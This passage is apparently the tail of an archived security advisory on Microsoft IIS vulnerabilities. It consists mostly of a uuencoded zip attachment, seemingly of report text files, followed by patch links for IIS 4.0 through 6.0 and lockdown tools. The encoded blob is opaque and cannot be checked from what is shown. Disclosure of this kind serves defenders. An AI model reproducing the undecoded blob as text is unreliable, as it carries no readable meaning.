	M3!IV#FUJZUI&G^J!X*$A<QAD`EW!_*W?VGC>=,@DF0-\"R!PGL+T\\0YC29\"QS

	ME;Y,ED($$R6O6+&)&/O*EIAJ[0,NLP!!6)<U@Y.+BS,HMW_ZGZ=B5QS7^A$J

	MS[/<R$K6EY<!7X8#^0^3213,]@\\G\"`M0%70\'/[$>R_?\'H_\'^:#P:T0H?LH+L

	MD%VOOD/.2^+,U0.((.AH:*F*.[V;Z].3GB>RW#B03$I@U2/=]B@:P[T+8*_@

	M3\":P(+\";.->4QZ+\'2^5K\\D\\@\'V3+-9&\"O?3HNR&*`*98=[1>#HEU^D,A.$\"Q

	MWSXEG(<`T^W(@->XC[/$LA\\$)8(O!1_BW2!7YD!H0V7$T/;UZ=F.U7^W0^.1

	M\\;Y2QDI@2P@\\T&9<,+&OT*7!S-B&M90^M%[9B3/.(\"\\?\"$=6.&Y\"A`4\'?Y?*

	M(AD41B7TS05;U0C+Q!-B<IF;\\(O`54C8@3A3<HE*(X4)+:`R*!#)+J_%U!ZM

	M0?,\"JB%FBL0$L\'!?I(YC1$K(I8C*]DY?7\"]5$$?D9,G:H^!:\\4`UA3$0HN]Q

	M$@$/>89`O<K@.+0$90[$\\Q#+DMM9/XJ-+>CF+0FE2JVS():40^MPN<R6I=4<

	MH4PF`.\"2+/LJ=8RDFB!3:)M#XQR>20OO-A<&;_,8*8(T2$RYR`#H\'9P(@90X

	MC=5YG+A2-]VHX4XA/<$V8Y/@F36M*%T\\7E!H@YJBE&T!,OED+A	**SULI-

	M8A7/;!I%O#\":KMU@74UEAV$8`7@-I8<\"PB3T96G0,`D<(JU7QGE29U&5A3TV

	MV;E$ZEVZLE\"3T,;PB@RR<\'Z7E%8U5-(N&*(R-:%HF7\'%0AQI><]HU\'&JNODX

	M4FH.+&\"7K`5).]$V/%&XA$?3LG;5RN1(_709ME$5N50P96SJ2[FFHJ]?Z6\"F

	M%*QA09%<EQPAHC(A8&P99PQNU@9;/ADLNAV7-YSZL]1&%J1V8\'52*FLR#;=V

	MY1(92:4ZBC!4`\"%B([IMN@.B;!QN6CX%N2=2F$%J1G:0)\"KTV\'=6E*,0K<*,

	MHX#!DT<P2`ND<S;:/`-\\J7)^PYH\";V&,(K-(U@96\"RE7MAS7S@NJJ$J8$99-

	M,ZZ$65*8EC+FW\"[_U`,)X\"(>[WFX3O>HVEH@N4M4@0MR1ET0H[GZKS+.C?_!

	M\'4UD=*4NWZ6Z\"C?G<6%\\JE\'8.:/4S61>K]E\'Y\"O`/39,5-J949RX8+OE;!%S

	M$8\'D++\\J0@[[K]A4\"B$\\*>5B]2DA/9NOH%($\'_H,U\\-\"H2;B7(Z099G]05UW

	M`,)U9A,4U^GW,H])CF[\'971,ZV/3Q$-,;5,5MXKC.<RU5;)&1@W0\"+NVJ9C,

	MPE5<-O=#A1!E$&\"$[%[J#\\L#HFU5[=!]J)ZW5TOL4,&K=MF.!+.NL$F!TP6\'

	M?-(-^3\'G=LK7F=WHFMU!8_O$,=Y`60NDR4>=F!\"!=R_L0PEOEINL1$^QP1;N

	MM.IV#H_URAL\\F\"N54E7B;ILS1*T9X=T`!Q&3]\"]BK,#AAB>;;59S/N5^W@M!

	M.2*,=4`XF`1\"PY=2%PBCR\'!J):G.L/O!O.3B-E2%,F\'5[5+#C\'R05$%W!)>Q

	MQ\'3M%,QUW[0,4!$IXJA=8?YJ5V-3K7=>&/B2O]LMIS\"67=,>](?],?-MS)7T

	MJ/FNK;(?8]HW>::-\\ZH-T&S-`#%V*`;AKS;@(!B8H)VJ%>U\"M:U=:XXH5*@$

	MAE3F[)EQH1U@\'-<KS8\"/#+L]F2-Q9F#[/M:PEGE1+-_L[6&7U\'?[J;V*.\"\'T

	M!^I?(\'>-;%+J5ON$E)R;+@[Y*<-`LLU*1&NPS3#QQA;3&NLL\'`5>K*`-D\"KV

	MW/0]-WWO_;4_W/4\'4_(3XN0=D(H+T#JQP*W?B\"N@M!9GR#**<L5I,_%=H:J0

	M.59OCV*VKM;(.!]5OE!S(OU;KFC).Q(0*+F-^E)E\'(OF)D?\'J4F\"[&F<\')W(

	MV`B5<+.U01:9C\'.M:8+@9IK=2V[HY)8EBM2HGVQ\"S95Q*5*_QZNQ1GD9PPJ9

	M_$+>Q4&[+_`.VXP\\OIL78CO8$8/#P^DN==\",\'9W$=T`B,:8\")K&GA;PF!U`^

	MHC@$N[O#5IC,/K+;(`(9HL2STNV3\"E,FJ;Q`_$A@5WF6FF(:L;L@4N2DD`4N

	M1!HR#H_*!U9NFBM(Q523<%T!(&D7!L*@!CY!(Q+KK,1`/3=M)Q1LJ<F,P`+X

	MFSH*II07;7[L.G52\"N-R0?`G96B*+L>MO>>)I>DZJMV%C!-#Y6=F@UJ<$>U%

	MEQ5*C#$96R)1PE;;U+K%5V5AV@#));$@J44ETSM5\"9[RUK0O?M=5T*5V4$V%

	M$\"GBPFRJN<TA*4\"30BB?L(SB^!HYOMG9N:E3\\H=+()V3\'F.7]\'-U)W-;Y%,3

	MJUZ.\\VV*)\'U/6M!S9^NR!+LYEUM);*H-BWLH%Z::0&75FL6QLTE\')&LFH

	M=T3,I3:`FWT=D>6M#G9N4#[J+*>]%C_\'6*.LP6DA3)JV=1\"&Y#^@+EVE`JM_

	M9>7\\JE0X0X$*VS9ZA6F%KA-\'><L3Y3*D7I4I\'J\'D!<?U(N/6Q#..T@R*IZ[)

	M1&S]7\'_M=H[^GU^F5W)=+A8RI\\YW\\WJ[`VCK\'8IEO(T@]X&JM8RH7<N=N345

	MPRB0.)-6SCU3-\'R1$39PTXT\\]6N6FP#6MD]DNK)XJEC0BH8^E4\'FQ2+98W_?

	M^WA%(<D?#?P^745N4O=<ZR(UY?\",1+WIK5Y\\AK#Q\\*#7?Q(.+`L;Y1Q,3P..

	M/UQ?B)O3=V<?+B\\N?_N\'>\'?9]RYN3OI8MA+SL9#<4<@62S+[1])A>YG*5\"<D

	MH>UU<K;94-7N$Z]WO]^(L].KT]UOO+H=:F^V6J^VW+-KT=:Y$L\\9K+A!R4\"H

	M<!Y)VZW;=^\":MM=_F.+!8US\'?5]XIK;B_D^(V9]0&5`G].8,`SY>7?YV=?Q>

	M?#J_N!\"7\'R[^`2RO;S\"JQI;R=I9D=VN\'[;-@=3M?U5_QS^U+K_<(K/^(4PK6

	M2O1T$<KHH3_O-2[^B(MQUI__M\'$MB6>/+N:TEVA?M&9EKBYS>;>0+@*(;=#P

	M>I_T\\,O^T#S*HIR#I)!NTP>9WP4>1?+\\-7V^__,SQORSV]F*HVVZ)[X[$B-<

	MVJ)K6YRPHNW>*P2O)5)T3OO>)97V@\'=^F]ZF/8^H=#M_^I]WWC:G;,5(#9@W

	M&$[Z/OX-8\'-3O]T&=]/KR66A,15E\'K+WPM2/CR#NT5@:G2ML]E/AT]1_\\:63

	M3Y=7)T+G`77=COP\'?Z\"&T6P0[([>[NWAJS\\:3T:3T=LMFKZW5[4$4\'>>G5Y<

	MO+L\\.:VH=#M_P5\\PXLA-/#14)A,UBWS[!2L<1($*\\*5W^S`(;A^BV>V#.NAV

	M;G&OA\\MTW:^NFZO,K%%\"\"-L^_WC$,`P^OVU=_Q5`FSO[?(<4N%(STL.1++)X

	MF^\\-#7AF&C@^PH)!T\'SWA.A1MY]^@X&A>S.30[I*3P)Z;[>V\")7!@7NF!*J?

	MKH^I[;:UTK3&]>6[OY_>;/\'G)$.$`GS84AVQ\"F!!&\'U-RBV7VP2-/_\"^7^D=

	MLBF_MBG6<6/DCFF6]XP)6*7N#FJMFK[.ELZ\"KZ2/+[\'I_M$`^MU\'QOX2R46<

	MK(^.?_UR_N\'TIG6+X9H72)K;%KR=UGWS@7\\=(:04_&G;Z(5\'ZB-:6A7;EKI\'

	M,\'RYOKDZ/7[O^3M6=GUTM#O8D/*:YXD`-0(VJB^)N66(V%)C6WO;1FKAI!:O

	M=[ZGWYZ._UME<%9\\WMD1%*+%HW7?R91BH*7FRO&Z\\8F(AMWN\\XB3+6&[$T5_

	MCOS#`[(]8UT:]7M\"68D3`FQI/+Y]F))AP\\[V]V%K_NW##.^(WI/;AW`*\"\\-U

	MY9MQ$8\\CNPL.<>6PQU2FX>W#D%PDJM\\SS#S`C`.L,(&U\'JC;!SFSU\\=$X<\"N

	MB3C\'5.CN_M#P(*49.0$/$XPY`,6#_0:%F9M+E(9,VU`916TJQ-L$[ZEO9Q(U

	M?#\\8N7F.\"LT81987N_YPW\\Q4$\\,+43O$>^\"WI1TS)O0I]&M<1F.#V(N4#I^G

	M9-$]M)1`909N1WB/#VI*!^!U-#%S)HQL9\'41[F_P,K*CIV[TYE@[SC?H1AP&

	M#[#63!DJ@]#$\'EK_)0ID3P<\\>P:,]Y6;9:B\\.\'/J5L2<R%C?^,!A8F;55%HS

	M1_5,0M8?-/E\\#I<I9NZ/VCIP5(+1IK0O41E.VU2:_D3:\'OO_#I7!!A72%WE`

	M)?UT4W*B1OYY(*V.)B^-QN?`4\"7)ZG&5U>VWK8XB0%,27QG[J:5IKD)4S$Q#

	M);061[IXD2??C!OLMS0]?5K3@95@X\'\\+EV!:X^*_@.*41P\\V8IB+\'=*OHQ19

	M&>,P-\'9\"\\8/MA2(E[HTG]76#&U&F;QQ/_3K6T;N*3L%CE\"-E^#>_\'14SJJ8R

	M\\FM*A`W-\'OLUM8JW@?4(WR$\\MCI2C=%CO]97TT;&UFXJ#8PX,K`.ZAQ`=Z3?

	MMHU@U*`PW;0&UA&/Z%7YB&RFR<^SU/R6IEF*VE[&DYHG0G?LU]\\/IQO?@Z=P

	MB2P?WZ3F-[\\3E4.R`[_!BXV]Y/,T:H;W_E/1`M+,@,V(T359S%+9K[/9L[,?

	M:;ORQHFA0CF:LCAS/7+W#+7J^K2^/F*$B0J/LG&7Z$?^X_7#6;M6\"$8U+L:_

	M#-<U+HP-H;=?OYU]N.^,JLW?8Y9HO-^VEZAAO[.1]4)KQR/+YR%\'>:?ARK^;

	M.6!#HD._ELKQ8:38K\'2<IIM2.\'L]#&H+4!;]IZE,K=61%!-(,#ILKS^;&,E>

	MXH-&UNC.GI#J2;ZF!@$3J6CM@]!0:7JAH[BY:KW2)KI.1^RW?KT>1>_I?AV#

	M:4624,U,1#_D-_L1?S)4#NT=TNK^L-;J9M8E*H>\'32K-B#G>L)%OX10TH@)%

	M86LO&]P/IRZ+/,:GQI\"],:PU_93^_C<HM_UH8B-1I=61TZKAD2(Y83,;-3-L

	M,*JI$)J#X#D<W)BG\\J3+L)7O/*ICS):9=BMV(S(XZO&Q.MIA5Z?I;O/;M/>V

	M,6IXU&N<KWMT>W34^]8).SHJTSIC]XC(^*CWQ*D[VC\'QN3L:_VA.<-3SW0UW

	MT]VN-UF\\`1OXP]\'K*6__MQ9JH;$-;0WP?*C-;@J[G?:]G1TW+5BNM[]O$[;[

	MR/8$R(M])V2MK^_L#CY[U3?OT6VSQK]#>_!9\'\'&WIMYC4EN[%G/`6\\U*3\'O/

	M\\SU[US9^M.TQ50-ZK_0K_;=7NF4(K[0Y3?D*(IGOK_3`-Y_H_Q\']=XQ7]>47

	MO/@^9O0\\/?!<#\\9K(ZZ\'GND.>\'KDZ;&WE.\'>:\\]VG;R_NAW3-WJ]Y^E@QXE+

	MO1MB&.`=.0PM_S1&X/5ZVW2>7N]@`\'X:`A)KO1W`9WM2!-,+PTDL\'FZ9,KC9

	M9@T-V]9>-=IR57<RS#C!C06QV=\'@YQ`.#M/2^.[Y1H)5I54C-1-XJ.4D5\\$]

	M.#%<&)-A/`PKMJUB9#-R_4B=]I]ZW%\'Z\\/O%1<6<GI=%F*V`J15C*T@RK6S?

	M1KN.X0LRW-`!Q3L9I]\\]WZ$AV]M<Z-$Z50?T-J4G8S\\6*J$3]-0*Q>LG>RZJ

	MV9<QW1AJAC::3H95^P@Q>+*?0[,\\>CB;EZF@IU+FN\"*U3INBD\'$U6J7_>KJ3

	M;U^G:?BM3C[]B8,,%ZI^/L.?.^/1\'=4[$GMAJG*7E+C)!P0]$9G$:\"O-$

	M+5B$=+:M?YGR69WT[M$)AM@>]Z-\'=6L^?4?@=#LD/TOO5N-S#.ZL;NL\\N2S:

	M([N=599_U7P\\AL]/P1K=09M,\\3G6A9*ITT)UM*DZNFIU4<B<;AF5\\--FJ<UC

	M/J9%9S^R!4W+@D\":TTKF[!$S!PDK=G=GV0,E(H7PB&GW<0!)?Z#\'2@4]P$TE

	M9`ER!21))\'/,D([4I.+XCVW*=O1\\YP]WH\':\'3S/PLG0PKB_3-69YC$$8RR1K

	MHLRVS$UW>&:\\I),BPCZ#7L5:52\"0+9)]V3..PD)!3UY%\'%FE5`<+^(F=^;L*

	M\\^`9[D.\'TQJ/ERH+L@]:0CND];1E#X9EU49VPL\\4LZ2TY\\H?D3(\'-)X]GN&X

	MT\'OV#W;(;O]6_?G.^<G1_F0Z\'!ESM\\>TF\\O8=>J3\"D/?\'YA3\"NY1$AV&2,05

	MW=5\\:\"._YP=2UE\'.6X_*7WS(U^U4C_G.\"_M\'+:*@JD//8YA*V!>_P&SM&8\"[

	M4O+9!V4ME1[\\T<D3=^J!GJ[S`TI/U+I=65-<EKDNW<S<\\&YG)7+%W&\\^!A-T

	M,8\'+S_E/9W[>N/<_4$L!`A8+%`````@`0VB++!@@]I0\\!@``GPP```T`````

	M`````0`@`(\"!`````\')E<&]R=%\\Q,\"YT>\'102P$\"%@L4````\"``F9XLLW$%K

	M[N8!``!L`P``#``````````!`\"``@(%G!@``<F5P;W)T7S8N=\'AT4$L!`A8+

	M%`````@`&F>++`7?E=[W!P``K1,```P``````````0`@`(\"!=P@``\')E<&]R

	M=%\\U+G1X=%!+`0(6\"Q0````(`%IGBRS;F+>]W`,``,4\'```,``````````$`

	M(`\"`@9@0``!R97!O<G1?.\"YT>\'102P$\"%@L4``(`\"`\"!4J8LLM^M-$<5``\"K

	M-0``#``````````!`\"``@(&>%```<F5P;W)T7S$N=\'AT4$L%!@`````%``4`

	*(P$```\\J````````

	`

	end

	11080 bytes

	

SOLUTION

	Hint :
	

	Although the following will not protect you  from  all  vulnerabilities,
	it can\'t do no harm to help secure your server with :
	

	http://www.microsoft.com/technet/security/tools/locktool.asp

	http://www.microsoft.com/technet/security/URLScan.asp

	

	

	Microsoft IIS 4.0:
	

	http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37931

	

	Microsoft IIS 5.0:
	

	http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37824

	

	Microsoft IIS 5.1:
	

	http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37857

	

	Microsoft IIS 6.0:
	

	Beta versions of .NET Server after Build 3605 contains fixes for IIS 6.0

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH